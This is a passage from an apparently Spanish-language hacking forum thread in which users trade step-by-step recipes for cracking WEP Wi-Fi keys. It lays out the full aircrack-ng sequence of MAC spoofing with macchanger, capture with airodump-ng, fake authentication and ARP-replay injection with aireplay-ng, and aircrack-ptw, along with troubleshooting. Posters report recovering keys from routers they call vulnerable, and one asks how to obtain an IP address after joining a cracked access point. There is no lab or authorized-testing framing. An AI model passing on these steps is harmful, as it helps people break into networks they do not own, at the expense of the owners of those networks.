|
|
|
|
the_often
 Desconectado
Mensajes: 698
|
 |
« Respuesta #82 en: 27-Junio 19:09:11 (Mircoles) » |
|
A ver, basicamente lo que dice ese post que te hemos recomendado es que si te sigue sin funcionar despues de haber probado con las difereentes opciones que alli se explican, pues lo mas probable es QUE EL ROUTER YA ESTÁ PROTEGIDO CONTRA ATAQUES SIN CLIENTES Y NECESITES UN CLIENTE REAL PARA PODER HACER ALGO. Y tambien influye mucho que la señal que tengas sea medianamente buena. Sino nada.
Lo has entendido ya??
Problema de tu tarjeta no es, porque esa tarjeta puede inyectar sin problemas. Tienes que hacer BIEN los pasos, eso sí. Cuando lo pruebes con un router QUE SEA VULNERABLE (cualquiera con mas de un año o dos, o cualquiera de los que suele montar telefonica) pues ya verás como sí funciona.
Ademas, si te has leido el post que se te indicó, habras visto que para atakes sin clientes tambien se pueden usar el de chop-chop y el de fragmentacion, teniendo algun data previo.
Saludos!
|
|
|
|
« Última modificación: 27-Junio 19:53:57 (Mircoles) por the_often »
|
En línea
|
El cura en misa: "...y dijo Jesús: 'Lázaro, levantate y anda'. Y entonces Lázaro se levantó y andó..."
Y un feligrés le interrumpe: "¡¡ <b>ANDUVO,</b> ATONTAO !!"
El cura continua: "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."
Jejejeje!
|
|
|
|
|
|
|
takoldc
Desconectado
Mensajes: 31
|
|
« Respuesta #85 en: 07-Julio 21:13:49 (Sbado) » |
|
He probado el ataque -3 sin cliente asociado y ha funcionado.  siguiendo los siguientes pasos: 1º> iwconfig 2º> macchanger 3º> airodump-ng (interfaz ke sea) 4º> airodump-ng -c (canal ke sea) -w (nombre de archivo ke keramos) (interfaz) 5º> aireplay-ng -1 30 -e (nombre de ESSID) -a (MAC del AP a atacar) -h (nuestra MAC falsa) (interfaz) 6º> aireplay-ng -3 -b (MAC a atacar) -h (nuestra MAC falsa) (interfaz) 7º> aircrack-ptw (nombre del archivo ke elegimos antes)-01.cap y en segundos FOUND KEYespero ke le sirva a alguien. seguire probando otros ataques............. 1 saludo |
|
|
|
|
En línea
|
Busca, Lee y luego Pregunta
|
|
|
|
|
|
|
takoldc
Desconectado
Mensajes: 31
|
|
« Respuesta #88 en: 12-Julio 06:56:14 (Jueves) » |
|
Hola Alvaro... creo recordar que : :  PWR: oscilaba entre 20 y 22 RXQ: entre 90 y100 Tiempo de asta que apareció una petición de ARP : + ó - 30 ó 45 minutos tiempo de captura de #DATAs: En un par de horas capture 600.000 Lo siento no me acuerdo de mas, espero te sirva de algo, recuerda que es orientativo pues no siempre es igual.  1salu2 |
|
|
|
|
En línea
|
Busca, Lee y luego Pregunta
|
|
|
|
|
|
|
|
|
takoldc
Desconectado
Mensajes: 31
|
|
« Respuesta #92 en: 22-Julio 22:53:28 (Domingo) » |
|
Amigos tengo un problema, resulta ke hoy he ido a usar Wifiway y al poner iwconfig me sale la tarjeta reconocida en eth2 como siempre, pues bien, cuando escribo airodump-ng eth2parece que quiere arrancar pero al los pocos segundos sale algo de Down cuando esto no me ha salido nunca :o  ke puede haber pasao a lo peor me he cargao la tarjeta? A ver si me podeis ayudar pues muy raro, raro, raro. |
|
|
|
|
En línea
|
Busca, Lee y luego Pregunta
|
|
|
|
|
|
|
takoldc
Desconectado
Mensajes: 31
|
|
« Respuesta #95 en: 23-Julio 17:07:30 (Lunes) » |
|
gracias the_often pero nunca habia tenido que meter el comando ifconfig eth2 up y siempre me habia funcionado muy bien y nunca se habia caido, no se, me da miedo haberme cargao la tarjeta,ó alomojo no es paratanto alomojo.....  ¿os ha pasado esto a alguno? |
|
|
|
|
En línea
|
Busca, Lee y luego Pregunta
|
|
|
the_often
Desconectado
Mensajes: 698
|
|
« Respuesta #96 en: 27-Julio 05:44:51 (Viernes) » |
|
gracias the_often pero nunca habia tenido que meter el comando ifconfig eth2 up y siempre me habia funcionado muy bien y nunca se habia caido, no se, me da miedo haberme cargao la tarjeta,ó alomojo no es paratanto alomojo..... ¿os ha pasado esto a alguno? No es nada raro tener que levantar la tarjeta a veces. Depende sobre todo de la tarjeta, o de que se haya quedado algo boba despues de usar airodump por ejemplo, y haya que bajarla y volver a levantarla, etc.... Pero como ya digo levantar la tarjeta no es una cosa extraña. saludos |
|
|
|
|
En línea
|
El cura en misa: "...y dijo Jesús: 'Lázaro, levantate y anda'. Y entonces Lázaro se levantó y andó..."
Y un feligrés le interrumpe: "¡¡ <b>ANDUVO,</b> ATONTAO !!"
El cura continua: "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."
Jejejeje!
|
|
|
|
|
Aioros
Desconectado
Mensajes: 2
|
|
« Respuesta #98 en: 30-Agosto 10:56:01 (Jueves) » |
|
sois la polla chavales.. a pesar de tener una realtek 8187 de 20€ , jejeje, me he tenido que leer muchos manuales y multitud de foros..al principio no me salia nada..luego descifre una wep con A1 + A3 , luego comprobando que con otras conexiones no me subian los datas, lei vuestro foro, y ahora por fin he conseguido leer multitud de datas con los que podré descifrar todas las weps. Gracias.. nota: a los novatos(como yo, aunque ya no se si lo seré tanto ,jejee) decirles que lean un poco los manuales, porque hay un monton de formas de hacerlo (con linux). Utilizad wifiway 0.6, más que todo para no tener que parchear mucho. Cualquier duda que yo os pueda resolver os la resolveré encantado. Gracias de nuevo por vuestra gran ayuda y colaboración. Un Saludo  |
|
|
|
|
En línea
|
|
|
|
|
|
spectro70
Desconectado
Mensajes: 5
|
|
« Respuesta #100 en: 31-Agosto 01:26:21 (Viernes) » |
|
recientemente he adquirido un adaptador usb wisacom, con chipset zydas. despues de leer todo lo que he podido, aqui y alli, he decidido meterle mano. utilizo el wifiway 8 intento el ataque -3 sin cliente asociado 1º iwconfig (me sale eth2) 2º macchanger (pongo MAC falsa) 3º airodump-ng eth2 4º airodump-ng -c 6 -w captura eth2 5º aireplay-ng -1 30 -e WLAN_DD -a (MAC a atacar) -h ( MAC falsa) eth2 6º aireplay-ng -3 -b (MAC a atacar) -h (nuestra MAC falsa) eth2 read 100000 packets (got 0 ARP request), sent 0 packets...(0pps) 7º aircrack-ptw captura -01.cap this is aircrack-ptw 1.0.0 for more informations see http://www-cdc.informatik.tu-darmstadt.de/aircrack-ptw/usage: aircrack-ptw <capturefile> ¿que hago mal? salu2 |
|
|
|
|
En línea
|
|
|
|
Aioros
Desconectado
Mensajes: 2
|
|
« Respuesta #101 en: 31-Agosto 08:27:57 (Viernes) » |
|
A mi modo de ver, para poder subir los arp's, tiene que haber un cliente asociado siempre..sino lo hay, lo creas tu con el ataque 1, siguiendo paso a paso las indicaciones..después haces la inyección de paquetes. Deduzco que te saltas el A1 por algún motivo. Si puedes decir porque, te ayudaria mejor. Ataque 1 --> aireplay-ng -1 0 -e "essid"(que es el nombre de la red) -a BSSID(de dicha red) -h MAC(la que quieras asociar,puede ser la tuya o una que te inventes) wlan0(tu tarjeta, la ves al hacer iwconfig). quedaría--> aireplay-ng -1 0 -e "essid" -a BSSID -h MAC wlan0 ó utilizar el mismo, pero cada 30 segundos comprueba su asosiación: aireplay-ng -1 30 -e "essid" -a BSSID -h MAC wlan0 Este ataque lo considero fundamental. Cuando logre asociarte..Todo te saldrá bien. |
|
|
|
|
En línea
|
|
|
|
ChimoC
Moderador Global
Desconectado
Mensajes: 3672
|
|
« Respuesta #102 en: 31-Agosto 10:33:49 (Viernes) » |
|
6º aireplay-ng -3 -b (MAC a atacar) -h (nuestra MAC falsa) eth2 read 100000 packets (got 0 ARP request), sent 0 packets...(0pps) 7º aircrack-ptw captura -01.cap this is aircrack-ptw 1.0.0 for more informations see http://www-cdc.informatik.tu-darmstadt.de/aircrack-ptw/usage: aircrack-ptw <capturefile> ¿que hago mal? Buenas: Pues que si no tienes datas (y/o arp) para que narices lanzas el aircrack-ptw Un saludo ChimoC |
|
|
|
|
En línea
|
|
|
|
spectro70
Desconectado
Mensajes: 5
|
|
« Respuesta #103 en: 31-Agosto 11:16:30 (Viernes) » |
|
A mi modo de ver, para poder subir los arp's, tiene que haber un cliente asociado siempre..sino lo hay, lo creas tu con el ataque 1, siguiendo paso a paso las indicaciones..después haces la inyección de paquetes. Deduzco que te saltas el A1 por algún motivo. Si puedes decir porque, te ayudaria mejor. Ataque 1 --> aireplay-ng -1 0 -e "essid"(que es el nombre de la red) -a BSSID(de dicha red) -h MAC(la que quieras asociar,puede ser la tuya o una que te inventes) wlan0(tu tarjeta, la ves al hacer iwconfig). quedaría--> aireplay-ng -1 0 -e "essid" -a BSSID -h MAC wlan0 ó utilizar el mismo, pero cada 30 segundos comprueba su asosiación: aireplay-ng -1 30 -e "essid" -a BSSID -h MAC wlan0 Este ataque lo considero fundamental. Cuando logre asociarte..Todo te saldrá bien. en el paso 5 mando el ataque 1 para asociarme salu2 |
|
|
|
|
En línea
|
|
|
|
spectro70
Desconectado
Mensajes: 5
|
|
« Respuesta #104 en: 31-Agosto 11:20:58 (Viernes) » |
|
6º aireplay-ng -3 -b (MAC a atacar) -h (nuestra MAC falsa) eth2 read 100000 packets (got 0 ARP request), sent 0 packets...(0pps) 7º aircrack-ptw captura -01.cap this is aircrack-ptw 1.0.0 for more informations see http://www-cdc.informatik.tu-darmstadt.de/aircrack-ptw/usage: aircrack-ptw <capturefile> ¿que hago mal? Buenas: Pues que si no tienes datas (y/o arp) para que narices lanzas el aircrack-ptw Un saludo ChimoC tienes razon, se puede tirar horas pero no pillo ningun #data, por lo tanto no me funciona ningun ataque. tambien he probado el de fragmentacion, pero sigo igual, no pillo ningun #data. salu2 |
|
|
|
|
En línea
|
|
|
|
|
|
eraso71
Desconectado
Mensajes: 10
|
|
« Respuesta #106 en: 26-Septiembre 23:17:20 (Mircoles) » |
|
Hola encontre mi primera clave WEP, me conecto al Ap, pero no me asigna IP...que pasos debo seguir ? Gracias gracias the_often pero nunca habia tenido que meter el comando ifconfig eth2 up y siempre me habia funcionado muy bien y nunca se habia caido, no se, me da miedo haberme cargao la tarjeta,ó alomojo no es paratanto alomojo..... ¿os ha pasado esto a alguno? No es nada raro tener que levantar la tarjeta a veces. Depende sobre todo de la tarjeta, o de que se haya quedado algo boba despues de usar airodump por ejemplo, y haya que bajarla y volver a levantarla, etc.... Pero como ya digo levantar la tarjeta no es una cosa extraña. saludos |
|
|
|
|
En línea
|
|
|
|
|
|
|
|
|
|
|
|
Autor